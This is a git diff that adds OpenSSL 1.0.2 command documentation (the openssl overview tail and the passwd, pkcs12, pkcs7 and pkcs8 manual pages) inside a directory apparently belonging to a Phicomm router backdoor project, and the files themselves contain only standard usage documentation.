+=head2 STANDARD COMMANDS
+
+=over 10
+
+=item L<B<asn1parse>|asn1parse(1)>
+
+Parse an ASN.1 sequence.
+
+=item L<B<ca>|ca(1)>
+
+Certificate Authority (CA) Management.  
+
+=item L<B<ciphers>|ciphers(1)>
+
+Cipher Suite Description Determination.
+
+=item L<B<cms>|cms(1)>
+
+CMS (Cryptographic Message Syntax) utility
+
+=item L<B<crl>|crl(1)>
+
+Certificate Revocation List (CRL) Management.
+
+=item L<B<crl2pkcs7>|crl2pkcs7(1)>
+
+CRL to PKCS#7 Conversion.
+
+=item L<B<dgst>|dgst(1)>
+
+Message Digest Calculation.
+
+=item B<dh>
+
+Diffie-Hellman Parameter Management.
+Obsoleted by L<B<dhparam>|dhparam(1)>.
+
+=item L<B<dhparam>|dhparam(1)>
+
+Generation and Management of Diffie-Hellman Parameters. Superseded by 
+L<B<genpkey>|genpkey(1)> and L<B<pkeyparam>|pkeyparam(1)>
+
+
+=item L<B<dsa>|dsa(1)>
+
+DSA Data Management.
+
+=item L<B<dsaparam>|dsaparam(1)>
+
+DSA Parameter Generation and Management. Superseded by 
+L<B<genpkey>|genpkey(1)> and L<B<pkeyparam>|pkeyparam(1)>
+
+=item L<B<ec>|ec(1)>
+
+EC (Elliptic curve) key processing
+
+=item L<B<ecparam>|ecparam(1)>
+
+EC parameter manipulation and generation
+
+=item L<B<enc>|enc(1)>
+
+Encoding with Ciphers.
+
+=item L<B<engine>|engine(1)>
+
+Engine (loadble module) information and manipulation.
+
+=item L<B<errstr>|errstr(1)>
+
+Error Number to Error String Conversion.
+
+=item B<gendh>
+
+Generation of Diffie-Hellman Parameters.
+Obsoleted by L<B<dhparam>|dhparam(1)>.
+
+=item L<B<gendsa>|gendsa(1)>
+
+Generation of DSA Private Key from Parameters. Superseded by 
+L<B<genpkey>|genpkey(1)> and L<B<pkey>|pkey(1)>
+
+=item L<B<genpkey>|genpkey(1)>
+
+Generation of Private Key or Parameters.
+
+=item L<B<genrsa>|genrsa(1)>
+
+Generation of RSA Private Key. Superceded by L<B<genpkey>|genpkey(1)>.
+
+=item L<B<nseq>|nseq(1)>
+
+Create or examine a netscape certificate sequence
+
+=item L<B<ocsp>|ocsp(1)>
+
+Online Certificate Status Protocol utility.
+
+=item L<B<passwd>|passwd(1)>
+
+Generation of hashed passwords.
+
+=item L<B<pkcs12>|pkcs12(1)>
+
+PKCS#12 Data Management.
+
+=item L<B<pkcs7>|pkcs7(1)>
+
+PKCS#7 Data Management.
+
+=item L<B<pkey>|pkey(1)>
+
+Public and private key management.
+
+=item L<B<pkeyparam>|pkeyparam(1)>
+
+Public key algorithm parameter management.
+
+=item L<B<pkeyutl>|pkeyutl(1)>
+
+Public key algorithm cryptographic operation utility.
+
+=item L<B<rand>|rand(1)>
+
+Generate pseudo-random bytes.
+
+=item L<B<req>|req(1)>
+
+PKCS#10 X.509 Certificate Signing Request (CSR) Management.
+
+=item L<B<rsa>|rsa(1)>
+
+RSA key management.
+
+
+=item L<B<rsautl>|rsautl(1)>
+
+RSA utility for signing, verification, encryption, and decryption. Superseded
+by  L<B<pkeyutl>|pkeyutl(1)>
+
+=item L<B<s_client>|s_client(1)>
+
+This implements a generic SSL/TLS client which can establish a transparent
+connection to a remote server speaking SSL/TLS. It's intended for testing
+purposes only and provides only rudimentary interface functionality but
+internally uses mostly all functionality of the OpenSSL B<ssl> library.
+
+=item L<B<s_server>|s_server(1)>
+
+This implements a generic SSL/TLS server which accepts connections from remote
+clients speaking SSL/TLS. It's intended for testing purposes only and provides
+only rudimentary interface functionality but internally uses mostly all
+functionality of the OpenSSL B<ssl> library.  It provides both an own command
+line oriented protocol for testing SSL functions and a simple HTTP response
+facility to emulate an SSL/TLS-aware webserver.
+
+=item L<B<s_time>|s_time(1)>
+
+SSL Connection Timer.
+
+=item L<B<sess_id>|sess_id(1)>
+
+SSL Session Data Management.
+
+=item L<B<smime>|smime(1)>
+
+S/MIME mail processing.
+
+=item L<B<speed>|speed(1)>
+
+Algorithm Speed Measurement.
+
+=item L<B<spkac>|spkac(1)>
+
+SPKAC printing and generating utility
+
+=item L<B<ts>|ts(1)>
+
+Time Stamping Authority tool (client/server)
+
+=item L<B<verify>|verify(1)>
+
+X.509 Certificate Verification.
+
+=item L<B<version>|version(1)>
+
+OpenSSL Version Information.
+
+=item L<B<x509>|x509(1)>
+
+X.509 Certificate Data Management.
+
+=back
+
+=head2 MESSAGE DIGEST COMMANDS
+
+=over 10
+
+=item B<md2>
+
+MD2 Digest
+
+=item B<md5>
+
+MD5 Digest
+
+=item B<mdc2>
+
+MDC2 Digest
+
+=item B<rmd160>
+
+RMD-160 Digest
+
+=item B<sha>            
+
+SHA Digest
+
+=item B<sha1>           
+
+SHA-1 Digest
+
+=item B<sha224>
+
+SHA-224 Digest
+
+=item B<sha256>
+
+SHA-256 Digest
+
+=item B<sha384>
+
+SHA-384 Digest
+
+=item B<sha512>
+
+SHA-512 Digest
+
+=back
+
+=head2 ENCODING AND CIPHER COMMANDS
+
+=over 10
+
+=item B<base64>
+
+Base64 Encoding
+
+=item B<bf bf-cbc bf-cfb bf-ecb bf-ofb>
+
+Blowfish Cipher
+
+=item B<cast cast-cbc>
+
+CAST Cipher
+
+=item B<cast5-cbc cast5-cfb cast5-ecb cast5-ofb>
+
+CAST5 Cipher
+
+=item B<des des-cbc des-cfb des-ecb des-ede des-ede-cbc des-ede-cfb des-ede-ofb des-ofb>
+
+DES Cipher
+
+=item B<des3 desx des-ede3 des-ede3-cbc des-ede3-cfb des-ede3-ofb>
+
+Triple-DES Cipher
+
+=item B<idea idea-cbc idea-cfb idea-ecb idea-ofb>
+
+IDEA Cipher
+
+=item B<rc2 rc2-cbc rc2-cfb rc2-ecb rc2-ofb>
+
+RC2 Cipher
+
+=item B<rc4>
+
+RC4 Cipher
+
+=item B<rc5 rc5-cbc rc5-cfb rc5-ecb rc5-ofb>
+
+RC5 Cipher
+
+=back
+
+=head1 PASS PHRASE ARGUMENTS
+
+Several commands accept password arguments, typically using B<-passin>
+and B<-passout> for input and output passwords respectively. These allow
+the password to be obtained from a variety of sources. Both of these
+options take a single argument whose format is described below. If no
+password argument is given and a password is required then the user is
+prompted to enter one: this will typically be read from the current
+terminal with echoing turned off.
+
+=over 10
+
+=item B<pass:password>
+
+the actual password is B<password>. Since the password is visible
+to utilities (like 'ps' under Unix) this form should only be used
+where security is not important.
+
+=item B<env:var>
+
+obtain the password from the environment variable B<var>. Since
+the environment of other processes is visible on certain platforms
+(e.g. ps under certain Unix OSes) this option should be used with caution.
+
+=item B<file:pathname>
+
+the first line of B<pathname> is the password. If the same B<pathname>
+argument is supplied to B<-passin> and B<-passout> arguments then the first
+line will be used for the input password and the next line for the output
+password. B<pathname> need not refer to a regular file: it could for example
+refer to a device or named pipe.
+
+=item B<fd:number>
+
+read the password from the file descriptor B<number>. This can be used to
+send the data via a pipe for example.
+
+=item B<stdin>
+
+read the password from standard input.
+
+=back
+
+=head1 SEE ALSO
+
+L<asn1parse(1)|asn1parse(1)>, L<ca(1)|ca(1)>, L<config(5)|config(5)>,
+L<crl(1)|crl(1)>, L<crl2pkcs7(1)|crl2pkcs7(1)>, L<dgst(1)|dgst(1)>,
+L<dhparam(1)|dhparam(1)>, L<dsa(1)|dsa(1)>, L<dsaparam(1)|dsaparam(1)>,
+L<enc(1)|enc(1)>, L<gendsa(1)|gendsa(1)>, L<genpkey(1)|genpkey(1)>,
+L<genrsa(1)|genrsa(1)>, L<nseq(1)|nseq(1)>, L<openssl(1)|openssl(1)>,
+L<passwd(1)|passwd(1)>,
+L<pkcs12(1)|pkcs12(1)>, L<pkcs7(1)|pkcs7(1)>, L<pkcs8(1)|pkcs8(1)>,
+L<rand(1)|rand(1)>, L<req(1)|req(1)>, L<rsa(1)|rsa(1)>,
+L<rsautl(1)|rsautl(1)>, L<s_client(1)|s_client(1)>,
+L<s_server(1)|s_server(1)>, L<s_time(1)|s_time(1)>,
+L<smime(1)|smime(1)>, L<spkac(1)|spkac(1)>,
+L<verify(1)|verify(1)>, L<version(1)|version(1)>, L<x509(1)|x509(1)>,
+L<crypto(3)|crypto(3)>, L<ssl(3)|ssl(3)>, L<x509v3_config(5)|x509v3_config(5)> 
+
+=head1 HISTORY
+
+The openssl(1) document appeared in OpenSSL 0.9.2.
+The B<list->I<XXX>B<-commands> pseudo-commands were added in OpenSSL 0.9.3;
+The B<list->I<XXX>B<-algorithms> pseudo-commands were added in OpenSSL 1.0.0;
+the B<no->I<XXX> pseudo-commands were added in OpenSSL 0.9.5a.
+For notes on the availability of other commands, see their individual
+manual pages.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/passwd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/passwd.pod
new file mode 100644
index 0000000..f449825
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/passwd.pod
@@ -0,0 +1,82 @@
+=pod
+
+=head1 NAME
+
+passwd - compute password hashes
+
+=head1 SYNOPSIS
+
+B<openssl passwd>
+[B<-crypt>]
+[B<-1>]
+[B<-apr1>]
+[B<-salt> I<string>]
+[B<-in> I<file>]
+[B<-stdin>]
+[B<-noverify>]
+[B<-quiet>]
+[B<-table>]
+{I<password>}
+
+=head1 DESCRIPTION
+
+The B<passwd> command computes the hash of a password typed at
+run-time or the hash of each password in a list.  The password list is
+taken from the named file for option B<-in file>, from stdin for
+option B<-stdin>, or from the command line, or from the terminal otherwise.
+The Unix standard algorithm B<crypt> and the MD5-based BSD password
+algorithm B<1> and its Apache variant B<apr1> are available.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-crypt>
+
+Use the B<crypt> algorithm (default).
+
+=item B<-1>
+
+Use the MD5 based BSD password algorithm B<1>.
+
+=item B<-apr1>
+
+Use the B<apr1> algorithm (Apache variant of the BSD algorithm).
+
+=item B<-salt> I<string>
+
+Use the specified salt.
+When reading a password from the terminal, this implies B<-noverify>.
+
+=item B<-in> I<file>
+
+Read passwords from I<file>.
+
+=item B<-stdin>
+
+Read passwords from B<stdin>.
+
+=item B<-noverify>
+
+Don't verify when reading a password from the terminal.
+
+=item B<-quiet>
+
+Don't output warnings when passwords given at the command line are truncated.
+
+=item B<-table>
+
+In the output list, prepend the cleartext password and a TAB character
+to each password hash.
+
+=back
+
+=head1 EXAMPLES
+
+B<openssl passwd -crypt -salt xx password> prints B<xxj31ZMTZzkVA>.
+
+B<openssl passwd -1 -salt xxxxxxxx password> prints B<$1$xxxxxxxx$UYCIxa628.9qXjpQCjM4a.>.
+
+B<openssl passwd -apr1 -salt xxxxxxxx password> prints B<$apr1$xxxxxxxx$dxHfLAsjHkDRmG83UXe8K0>.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs12.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs12.pod
new file mode 100644
index 0000000..8e0d917
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs12.pod
@@ -0,0 +1,368 @@
+
+=pod
+
+=head1 NAME
+
+pkcs12 - PKCS#12 file utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<pkcs12>
+[B<-export>]
+[B<-chain>]
+[B<-inkey filename>]
+[B<-certfile filename>]
+[B<-name name>]
+[B<-caname name>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-noout>]
+[B<-nomacver>]
+[B<-nocerts>]
+[B<-clcerts>]
+[B<-cacerts>]
+[B<-nokeys>]
+[B<-info>]
+[B<-des | -des3 | -idea | -aes128 | -aes192 | -aes256 | -camellia128 | -camellia192 | -camellia256 | -nodes>]
+[B<-noiter>]
+[B<-maciter | -nomaciter | -nomac>]
+[B<-twopass>]
+[B<-descert>]
+[B<-certpbe cipher>]
+[B<-keypbe cipher>]
+[B<-macalg digest>]
+[B<-keyex>]
+[B<-keysig>]
+[B<-password arg>]
+[B<-passin arg>]
+[B<-passout arg>]
+[B<-rand file(s)>]
+[B<-CAfile file>]
+[B<-CApath dir>]
+[B<-CSP name>]
+
+=head1 DESCRIPTION
+
+The B<pkcs12> command allows PKCS#12 files (sometimes referred to as
+PFX files) to be created and parsed. PKCS#12 files are used by several
+programs including Netscape, MSIE and MS Outlook.
+
+=head1 COMMAND OPTIONS
+
+There are a lot of options the meaning of some depends of whether a PKCS#12 file
+is being created or parsed. By default a PKCS#12 file is parsed. A PKCS#12
+file can be created by using the B<-export> option (see below).
+
+=head1 PARSING OPTIONS
+
+=over 4
+
+=item B<-in filename>
+
+This specifies filename of the PKCS#12 file to be parsed. Standard input is used
+by default.
+
+=item B<-out filename>
+
+The filename to write certificates and private keys to, standard output by
+default.  They are all written in PEM format.
+
+=item B<-passin arg>
+
+the PKCS#12 file (i.e. input file) password source. For more information about
+the format of B<arg> see the B<PASS PHRASE ARGUMENTS> section in
+L<openssl(1)|openssl(1)>.
+
+=item B<-passout arg>
+
+pass phrase source to encrypt any outputted private keys with. For more
+information about the format of B<arg> see the B<PASS PHRASE ARGUMENTS> section
+in L<openssl(1)|openssl(1)>.
+
+=item B<-password arg>
+
+With -export, -password is equivalent to -passout.
+Otherwise, -password is equivalent to -passin.
+
+=item B<-noout>
+
+this option inhibits output of the keys and certificates to the output file
+version of the PKCS#12 file.
+
+=item B<-clcerts>
+
+only output client certificates (not CA certificates).
+
+=item B<-cacerts>
+
+only output CA certificates (not client certificates).
+
+=item B<-nocerts>
+
+no certificates at all will be output.
+
+=item B<-nokeys>
+
+no private keys will be output.
+
+=item B<-info>
+
+output additional information about the PKCS#12 file structure, algorithms used and
+iteration counts.
+
+=item B<-des>
+
+use DES to encrypt private keys before outputting.
+
+=item B<-des3>
+
+use triple DES to encrypt private keys before outputting, this is the default.
+
+=item B<-idea>
+
+use IDEA to encrypt private keys before outputting.
+
+=item B<-aes128>, B<-aes192>, B<-aes256>
+
+use AES to encrypt private keys before outputting.
+
+=item B<-camellia128>, B<-camellia192>, B<-camellia256>
+
+use Camellia to encrypt private keys before outputting.
+
+=item B<-nodes>
+
+don't encrypt the private keys at all.
+
+=item B<-nomacver>
+
+don't attempt to verify the integrity MAC before reading the file.
+
+=item B<-twopass>
+
+prompt for separate integrity and encryption passwords: most software
+always assumes these are the same so this option will render such
+PKCS#12 files unreadable.
+
+=back
+
+=head1 FILE CREATION OPTIONS
+
+=over 4
+
+=item B<-export>
+
+This option specifies that a PKCS#12 file will be created rather than
+parsed.
+
+=item B<-out filename>
+
+This specifies filename to write the PKCS#12 file to. Standard output is used
+by default.
+
+=item B<-in filename>
+
+The filename to read certificates and private keys from, standard input by
+default.  They must all be in PEM format. The order doesn't matter but one
+private key and its corresponding certificate should be present. If additional
+certificates are present they will also be included in the PKCS#12 file.
+
+=item B<-inkey filename>
+
+file to read private key from. If not present then a private key must be present
+in the input file.
+
+=item B<-name friendlyname>
+
+This specifies the "friendly name" for the certificate and private key. This
+name is typically displayed in list boxes by software importing the file.
+
+=item B<-certfile filename>
+
+A filename to read additional certificates from.
+
+=item B<-caname friendlyname>
+
+This specifies the "friendly name" for other certificates. This option may be
+used multiple times to specify names for all certificates in the order they
+appear. Netscape ignores friendly names on other certificates whereas MSIE
+displays them.
+
+=item B<-pass arg>, B<-passout arg>
+
+the PKCS#12 file (i.e. output file) password source. For more information about
+the format of B<arg> see the B<PASS PHRASE ARGUMENTS> section in
+L<openssl(1)|openssl(1)>.
+
+=item B<-passin password>
+
+pass phrase source to decrypt any input private keys with. For more information
+about the format of B<arg> see the B<PASS PHRASE ARGUMENTS> section in
+L<openssl(1)|openssl(1)>.
+
+=item B<-chain>
+
+if this option is present then an attempt is made to include the entire
+certificate chain of the user certificate. The standard CA store is used
+for this search. If the search fails it is considered a fatal error.
+
+=item B<-descert>
+
+encrypt the certificate using triple DES, this may render the PKCS#12
+file unreadable by some "export grade" software. By default the private
+key is encrypted using triple DES and the certificate using 40 bit RC2.
+
+=item B<-keypbe alg>, B<-certpbe alg>
+
+these options allow the algorithm used to encrypt the private key and
+certificates to be selected. Any PKCS#5 v1.5 or PKCS#12 PBE algorithm name
+can be used (see B<NOTES> section for more information). If a a cipher name
+(as output by the B<list-cipher-algorithms> command is specified then it
+is used with PKCS#5 v2.0. For interoperability reasons it is advisable to only
+use PKCS#12 algorithms.
+
+=item B<-keyex|-keysig>
+
+specifies that the private key is to be used for key exchange or just signing.
+This option is only interpreted by MSIE and similar MS software. Normally
+"export grade" software will only allow 512 bit RSA keys to be used for
+encryption purposes but arbitrary length keys for signing. The B<-keysig>
+option marks the key for signing only. Signing only keys can be used for
+S/MIME signing, authenticode (ActiveX control signing)  and SSL client
+authentication, however due to a bug only MSIE 5.0 and later support
+the use of signing only keys for SSL client authentication.
+
+=item B<-macalg digest>
+
+specify the MAC digest algorithm. If not included them SHA1 will be used.
+
+=item B<-nomaciter>, B<-noiter>
+
+these options affect the iteration counts on the MAC and key algorithms.
+Unless you wish to produce files compatible with MSIE 4.0 you should leave
+these options alone.
+
+To discourage attacks by using large dictionaries of common passwords the
+algorithm that derives keys from passwords can have an iteration count applied
+to it: this causes a certain part of the algorithm to be repeated and slows it
+down. The MAC is used to check the file integrity but since it will normally
+have the same password as the keys and certificates it could also be attacked.
+By default both MAC and encryption iteration counts are set to 2048, using
+these options the MAC and encryption iteration counts can be set to 1, since
+this reduces the file security you should not use these options unless you
+really have to. Most software supports both MAC and key iteration counts.
+MSIE 4.0 doesn't support MAC iteration counts so it needs the B<-nomaciter>
+option.
+
+=item B<-maciter>
+
+This option is included for compatibility with previous versions, it used
+to be needed to use MAC iterations counts but they are now used by default.
+
+=item B<-nomac>
+
+don't attempt to provide the MAC integrity.
+
+=item B<-rand file(s)>
+
+a file or files containing random data used to seed the random number
+generator, or an EGD socket (see L<RAND_egd(3)|RAND_egd(3)>).
+Multiple files can be specified separated by a OS-dependent character.
+The separator is B<;> for MS-Windows, B<,> for OpenVMS, and B<:> for
+all others.
+
+=item B<-CAfile file>
+
+CA storage as a file.
+
+=item B<-CApath dir>
+
+CA storage as a directory. This directory must be a standard certificate
+directory: that is a hash of each subject name (using B<x509 -hash>) should be
+linked to each certificate.
+
+=item B<-CSP name>
+
+write B<name> as a Microsoft CSP name.
+
+=back
+
+=head1 NOTES
+
+Although there are a large number of options most of them are very rarely
+used. For PKCS#12 file parsing only B<-in> and B<-out> need to be used
+for PKCS#12 file creation B<-export> and B<-name> are also used.
+
+If none of the B<-clcerts>, B<-cacerts> or B<-nocerts> options are present
+then all certificates will be output in the order they appear in the input
+PKCS#12 files. There is no guarantee that the first certificate present is
+the one corresponding to the private key. Certain software which requires
+a private key and certificate and assumes the first certificate in the
+file is the one corresponding to the private key: this may not always
+be the case. Using the B<-clcerts> option will solve this problem by only
+outputting the certificate corresponding to the private key. If the CA
+certificates are required then they can be output to a separate file using
+the B<-nokeys -cacerts> options to just output CA certificates.
+
+The B<-keypbe> and B<-certpbe> algorithms allow the precise encryption
+algorithms for private keys and certificates to be specified. Normally
+the defaults are fine but occasionally software can't handle triple DES
+encrypted private keys, then the option B<-keypbe PBE-SHA1-RC2-40> can
+be used to reduce the private key encryption to 40 bit RC2. A complete
+description of all algorithms is contained in the B<pkcs8> manual page.
+
+=head1 EXAMPLES
+
+Parse a PKCS#12 file and output it to a file:
+
+ openssl pkcs12 -in file.p12 -out file.pem
+
+Output only client certificates to a file:
+
+ openssl pkcs12 -in file.p12 -clcerts -out file.pem
+
+Don't encrypt the private key:
+ 
+ openssl pkcs12 -in file.p12 -out file.pem -nodes
+
+Print some info about a PKCS#12 file:
+
+ openssl pkcs12 -in file.p12 -info -noout
+
+Create a PKCS#12 file:
+
+ openssl pkcs12 -export -in file.pem -out file.p12 -name "My Certificate"
+
+Include some extra certificates:
+
+ openssl pkcs12 -export -in file.pem -out file.p12 -name "My Certificate" \
+  -certfile othercerts.pem
+
+=head1 BUGS
+
+Some would argue that the PKCS#12 standard is one big bug :-)
+
+Versions of OpenSSL before 0.9.6a had a bug in the PKCS#12 key generation
+routines. Under rare circumstances this could produce a PKCS#12 file encrypted
+with an invalid key. As a result some PKCS#12 files which triggered this bug
+from other implementations (MSIE or Netscape) could not be decrypted
+by OpenSSL and similarly OpenSSL could produce PKCS#12 files which could
+not be decrypted by other implementations. The chances of producing such
+a file are relatively small: less than 1 in 256.
+
+A side effect of fixing this bug is that any old invalidly encrypted PKCS#12
+files cannot no longer be parsed by the fixed version. Under such circumstances
+the B<pkcs12> utility will report that the MAC is OK but fail with a decryption
+error when extracting private keys.
+
+This problem can be resolved by extracting the private keys and certificates
+from the PKCS#12 file using an older version of OpenSSL and recreating the PKCS#12
+file from the keys and certificates using a newer version of OpenSSL. For example:
+
+ old-openssl -in bad.p12 -out keycerts.pem
+ openssl -in keycerts.pem -export -name "My PKCS#12 file" -out fixed.p12
+
+=head1 SEE ALSO
+
+L<pkcs8(1)|pkcs8(1)>
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs7.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs7.pod
new file mode 100644
index 0000000..acfb810
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs7.pod
@@ -0,0 +1,105 @@
+=pod
+
+=head1 NAME
+
+pkcs7 - PKCS#7 utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<pkcs7>
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-print_certs>]
+[B<-text>]
+[B<-noout>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<pkcs7> command processes PKCS#7 files in DER or PEM format.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. B<DER> format is DER encoded PKCS#7
+v1.5 structure.B<PEM> (the default) is a base64 encoded version of
+the DER form with header and footer lines.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read from or standard input if this
+option is not specified.
+
+=item B<-out filename>
+
+specifies the output filename to write to or standard output by
+default.
+
+=item B<-print_certs>
+
+prints out any certificates or CRLs contained in the file. They are
+preceded by their subject and issuer names in one line format.
+
+=item B<-text>
+
+prints out certificates details in full rather than just subject and
+issuer names.
+
+=item B<-noout>
+
+don't output the encoded version of the PKCS#7 structure (or certificates
+is B<-print_certs> is set).
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<pkcs7>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 EXAMPLES
+
+Convert a PKCS#7 file from PEM to DER:
+
+ openssl pkcs7 -in file.pem -outform DER -out file.der
+
+Output all certificates in a file:
+
+ openssl pkcs7 -in file.pem -print_certs -out certs.pem
+
+=head1 NOTES
+
+The PEM PKCS#7 format uses the header and footer lines:
+
+ -----BEGIN PKCS7-----
+ -----END PKCS7-----
+
+For compatibility with some CAs it will also accept:
+
+ -----BEGIN CERTIFICATE-----
+ -----END CERTIFICATE-----
+
+=head1 RESTRICTIONS
+
+There is no option to print out all the fields of a PKCS#7 file.
+
+This PKCS#7 routines only understand PKCS#7 v 1.5 as specified in RFC2315 they 
+cannot currently parse, for example, the new CMS as described in RFC2630.
+
+=head1 SEE ALSO
+
+L<crl2pkcs7(1)|crl2pkcs7(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs8.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs8.pod
new file mode 100644
index 0000000..6901f1f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/pkcs8.pod
@@ -0,0 +1,255 @@
+=pod
+
+=head1 NAME
+
+pkcs8 - PKCS#8 format private key conversion tool
+
+=head1 SYNOPSIS
+
+B<openssl> B<pkcs8>
+[B<-topk8>]
+[B<-inform PEM|DER>]
+[B<-outform PEM|DER>]
+[B<-in filename>]
+[B<-passin arg>]
+[B<-out filename>]
+[B<-passout arg>]
+[B<-noiter>]
+[B<-nocrypt>]
+[B<-nooct>]
+[B<-embed>]
+[B<-nsdb>]
+[B<-v2 alg>]
+[B<-v2prf alg>]
+[B<-v1 alg>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<pkcs8> command processes private keys in PKCS#8 format. It can handle
+both unencrypted PKCS#8 PrivateKeyInfo format and EncryptedPrivateKeyInfo
+format with a variety of PKCS#5 (v1.5 and v2.0) and PKCS#12 algorithms.
+
+=head1 COMMAND OPTIONS
+
+=over 4
+
+=item B<-topk8>
+
+Normally a PKCS#8 private key is expected on input and a traditional format
+private key will be written. With the B<-topk8> option the situation is
+reversed: it reads a traditional format private key and writes a PKCS#8
+format key.
+
+=item B<-inform DER|PEM>
+
+This specifies the input format. If a PKCS#8 format key is expected on input
+then either a B<DER> or B<PEM> encoded version of a PKCS#8 key will be
+expected. Otherwise the B<DER> or B<PEM> format of the traditional format
+private key is used.
+
+=item B<-outform DER|PEM>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a key from or standard input if this
+option is not specified. If the key is encrypted a pass phrase will be
+prompted for.
+
+=item B<-passin arg>
+
+the input file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-out filename>
+
+This specifies the output filename to write a key to or standard output by
+default. If any encryption options are set then a pass phrase will be
+prompted for. The output filename should B<not> be the same as the input
+filename.
+
+=item B<-passout arg>
+
+the output file password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-nocrypt>
+
+PKCS#8 keys generated or input are normally PKCS#8 EncryptedPrivateKeyInfo
+structures using an appropriate password based encryption algorithm. With
+this option an unencrypted PrivateKeyInfo structure is expected or output.
+This option does not encrypt private keys at all and should only be used
+when absolutely necessary. Certain software such as some versions of Java
+code signing software used unencrypted private keys.
+
+=item B<-nooct>
+
+This option generates RSA private keys in a broken format that some software
+uses. Specifically the private key should be enclosed in a OCTET STRING
+but some software just includes the structure itself without the
+surrounding OCTET STRING.
+
+=item B<-embed>
+
+This option generates DSA keys in a broken format. The DSA parameters are
+embedded inside the PrivateKey structure. In this form the OCTET STRING
+contains an ASN1 SEQUENCE consisting of two structures: a SEQUENCE containing
+the parameters and an ASN1 INTEGER containing the private key.
+
+=item B<-nsdb>
+
+This option generates DSA keys in a broken format compatible with Netscape
+private key databases. The PrivateKey contains a SEQUENCE consisting of
+the public and private keys respectively.
+
+=item B<-v2 alg>
+
+This option enables the use of PKCS#5 v2.0 algorithms. Normally PKCS#8
+private keys are encrypted with the password based encryption algorithm
+called B<pbeWithMD5AndDES-CBC> this uses 56 bit DES encryption but it
+was the strongest encryption algorithm supported in PKCS#5 v1.5. Using 
+the B<-v2> option PKCS#5 v2.0 algorithms are used which can use any
+encryption algorithm such as 168 bit triple DES or 128 bit RC2 however
+not many implementations support PKCS#5 v2.0 yet. If you are just using
+private keys with OpenSSL then this doesn't matter.
+
+The B<alg> argument is the encryption algorithm to use, valid values include
+B<des>, B<des3> and B<rc2>. It is recommended that B<des3> is used.
+
+=item B<-v2prf alg>
+
+This option sets the PRF algorithm to use with PKCS#5 v2.0. A typical value
+values would be B<hmacWithSHA256>. If this option isn't set then the default
+for the cipher is used or B<hmacWithSHA1> if there is no default.
+
+=item B<-v1 alg>
+
+This option specifies a PKCS#5 v1.5 or PKCS#12 algorithm to use. A complete
+list of possible algorithms is included below.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<pkcs8>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head1 NOTES
+
+The encrypted form of a PEM encode PKCS#8 files uses the following
+headers and footers:
+
+ -----BEGIN ENCRYPTED PRIVATE KEY-----
+ -----END ENCRYPTED PRIVATE KEY-----
+
+The unencrypted form uses:
+
+ -----BEGIN PRIVATE KEY-----
+ -----END PRIVATE KEY-----
+
+Private keys encrypted using PKCS#5 v2.0 algorithms and high iteration
+counts are more secure that those encrypted using the traditional
+SSLeay compatible formats. So if additional security is considered
+important the keys should be converted.
+
+The default encryption is only 56 bits because this is the encryption
+that most current implementations of PKCS#8 will support.
+
+Some software may use PKCS#12 password based encryption algorithms
+with PKCS#8 format private keys: these are handled automatically
+but there is no option to produce them.
+
+It is possible to write out DER encoded encrypted private keys in
+PKCS#8 format because the encryption details are included at an ASN1
+level whereas the traditional format includes them at a PEM level.
+
+=head1 PKCS#5 v1.5 and PKCS#12 algorithms.
+
+Various algorithms can be used with the B<-v1> command line option,
+including PKCS#5 v1.5 and PKCS#12. These are described in more detail
+below.
+
+=over 4
+
+=item B<PBE-MD2-DES PBE-MD5-DES>
+
+These algorithms were included in the original PKCS#5 v1.5 specification.
+They only offer 56 bits of protection since they both use DES.
+
+=item B<PBE-SHA1-RC2-64 PBE-MD2-RC2-64 PBE-MD5-RC2-64 PBE-SHA1-DES>
+
+These algorithms are not mentioned in the original PKCS#5 v1.5 specification
+but they use the same key derivation algorithm and are supported by some
+software. They are mentioned in PKCS#5 v2.0. They use either 64 bit RC2 or
+56 bit DES.
+
